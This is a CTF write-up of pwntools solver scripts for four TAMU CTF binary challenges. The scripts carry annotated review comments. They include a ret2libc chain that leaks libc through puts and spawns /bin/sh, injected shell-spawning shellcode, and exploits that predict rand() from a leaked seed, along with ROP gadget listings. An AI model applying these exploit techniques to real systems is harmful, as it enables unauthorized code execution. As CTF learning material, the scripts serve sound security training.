TAMU writeup

PWN:

inspector-gadget:

exp:

from pwn import *
# Solver for the "inspector-gadget" challenge: a two-stage ret2libc.
# Stage 1 leaks a libc pointer by calling puts(puts@GOT) and returning into
# the program; stage 2 reuses the same overflow to call system("/bin/sh").
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])   # debug level echoes all traffic

# io=process("./inspector-gadget")
# Remote target; the commented-out process() line is the local-testing variant.
io=remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
elf=ELF("./inspector-gadget")
libc=ELF("./libc.so")   # challenge-provided libc; all libc symbol offsets come from it

# Hard-coded binary addresses. These only hold if the binary is not PIE
# (inferred from the fixed 0x40xxxx values -- TODO confirm).
me=0x4011a3             # presumably the vulnerable function, re-entered after the leak -- TODO confirm
pop_rdi_ret=0x40127b    # "pop rdi ; ret" gadget, matches the ROPgadget listing below
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]

io.recvuntil(b"pwn me\n")
# 0x18 bytes of filler up to the saved return address (offset is from the
# writeup, not derivable from this script), then: rdi = puts@GOT, call
# puts@PLT to print the resolved pointer, and return to `me` for round two.
payload=cyclic(0x18)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(me)
io.sendline(payload)
# Read up to the first 0x7f byte, take it and the 5 bytes before it as the
# 6 significant little-endian bytes of the leaked pointer, zero-extend to 8
# bytes and subtract puts' offset -- so despite the name this is the libc BASE.
# NOTE(review): fragile; any earlier 0x7f byte in the output would mis-parse.
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr:  "+hex(leak_addr))

# Stage 2: system("/bin/sh") computed from the leaked base.
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))   # first "/bin/sh" string found in libc
payload=cyclic(0x18)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)

io.recvuntil(b"pwn me\n")
io.sendline(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x0000000000401274 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401276 : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401278 : pop r14 ; pop r15 ; ret
# 0x000000000040127a : pop r15 ; ret
# 0x0000000000401273 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401277 : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000401129 : pop rbp ; ret
# 0x000000000040127b : pop rdi ; ret
# 0x0000000000401279 : pop rsi ; pop r15 ; ret
# 0x0000000000401275 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401016 : ret

# Unique gadgets found: 11

randomness:

exp:

from pwn import *
from ctypes import *
# Solver for the "randomness" challenge. The target asks for a seed and a
# guess; this script sends an address (puts@GOT) as the seed and the address
# of a win function as the guess. What the target does with those two values
# is not visible from this script -- TODO confirm against the binary.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])   # debug level echoes all traffic

# io=process("./randomness")
io = remote("tamuctf.com", 443, ssl=True, sni="randomness")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")   # host libc, only used for srand()/rand()

# Hard-coded binary addresses (non-PIE target, inferred from the fixed 0x40xxxx values).
puts_got=0x403448
win=0x4011d3

io.recvuntil(b"seed:\n")
io.sendline(str(puts_got))   # sent as a decimal string; pwntools encodes the str
cs.srand(0)                  # NOTE(review): has no effect on the payload -- the rand() send below is commented out

# gdb.attach(io)
# pause()

io.recvuntil(b"guess:\n")
# io.sendline(str(cs.rand()))
payload=str(win)             # the "guess" is the win address, not a rand() value
io.sendline(payload)

io.interactive()

sea-shells:

exp:

from pwn import *
from ctypes import *
# Solver for the "sea-shells" challenge: answer four numeric prompts (the 4th
# must match the target's rand()), read a leaked address, then send a buffer
# that carries a pointer and shellcode. Presumably the pointer redirects
# execution into the shellcode -- not verifiable from this script.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])   # debug level echoes all traffic

# io=process("./sea-shells")
io = remote("tamuctf.com", 443, ssl=True, sni="sea-shells")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")   # host libc, for rand()
# sc=b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
sc=asm(shellcraft.sh())   # pwntools' stock /bin/sh shellcode, assembled for the context arch (amd64)

io.recvuntil(b"1st number: ")
io.sendline(b"0")

io.recvuntil(b"2nd number: ")
io.sendline(b"0")

io.recvuntil(b"3rd number: ")
io.sendline(b"0")

io.recvuntil(b"4th number: ")
# rand() with no prior srand() behaves as if srand(1) was called, so this is
# a fixed value -- assumes the remote uses the same libc PRNG as the host.
io.sendline(str(cs.rand()))

io.recvuntil(b"work: ")
# Parses exactly 12 characters as hex (int() accepts a 0x prefix).
# NOTE(review): a fixed-width read breaks if the printed width ever differs.
leak_addr=int(io.recv(12),16)
print("leak_addr:  "+hex(leak_addr))

# gdb.attach(io)
# pause()

io.recvuntil(b"again? (y/n) ")
# io.sendline(b"n")

# "n" answers the prompt; then 16 zero bytes, a pointer 0x40 past the leak,
# and the shellcode. Presumably leak+0x40 is where `sc` ends up in memory --
# the offset is from the writeup, not derivable here; TODO confirm.
payload=b"n"+p64(0)+p64(0)+p64(leak_addr+0x40)+sc
io.sendline(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x000000000000131d : leave ; ret
# 0x0000000000001424 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001426 : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001428 : pop r14 ; pop r15 ; ret
# 0x000000000000142a : pop r15 ; ret
# 0x0000000000001423 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001427 : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000000115f : pop rbp ; ret
# 0x000000000000142b : pop rdi ; ret
# 0x0000000000001429 : pop rsi ; pop r15 ; ret
# 0x0000000000001425 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001016 : ret
# 0x0000000000001072 : ret 0x2f
# 0x000000000000128a : ret 0x8948

# Unique gadgets found: 14

unlucky:

exp:

from pwn import *
from ctypes import *
# Solver for the "unlucky" challenge: read a leaked address, derive the value
# the target presumably seeds rand() with, answer seven rand() prompts, then
# drop to an interactive session. Wrapped in a retry loop, so the attempt is
# evidently not reliable every time (the script does not show why).
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])   # debug level echoes all traffic

while True:
    try:
        # io=process("./unlucky")
        io = remote("tamuctf.com", 443, ssl=True, sni="unlucky")
        elf=ELF("./unlucky")     # loaded on every iteration but never referenced below
        cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")   # host libc, for srand()/rand()
        # gdb.attach(io)
        # pause()
        io.recvuntil(b": ")
        seed_addr=int(io.recv(15),16)   # fixed-width hex read (15 chars); int() accepts a 0x prefix
        print("seed_addr: "+hex(seed_addr))
        seed_addr+=0x2ec3               # constant offset from the leak to the seed value (from the writeup; not derivable here)
        # num=c_int(69)
        # seed_addr = addressof(num)
        print("seed_addr: "+hex(seed_addr))
        
        # ctypes passes a plain Python int as a C int and masks it to that
        # width, so only the low 32 bits of seed_addr reach srand(unsigned).
        cs.srand(seed_addr)
        for i in range(7):
            io.recvuntil(b":\n")
            io.sendline(str(cs.rand()))
        
        io.recvline()
        io.interactive()   # when this returns (connection closed) the loop reconnects; there is no break
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt, so Ctrl-C
        # cannot stop the loop. If remote() itself raised on the first pass,
        # `io` is unbound and io.close() raises NameError out of the handler.
        # `except Exception:` with a guard on io would be the usual fix.
        io.close()
        continue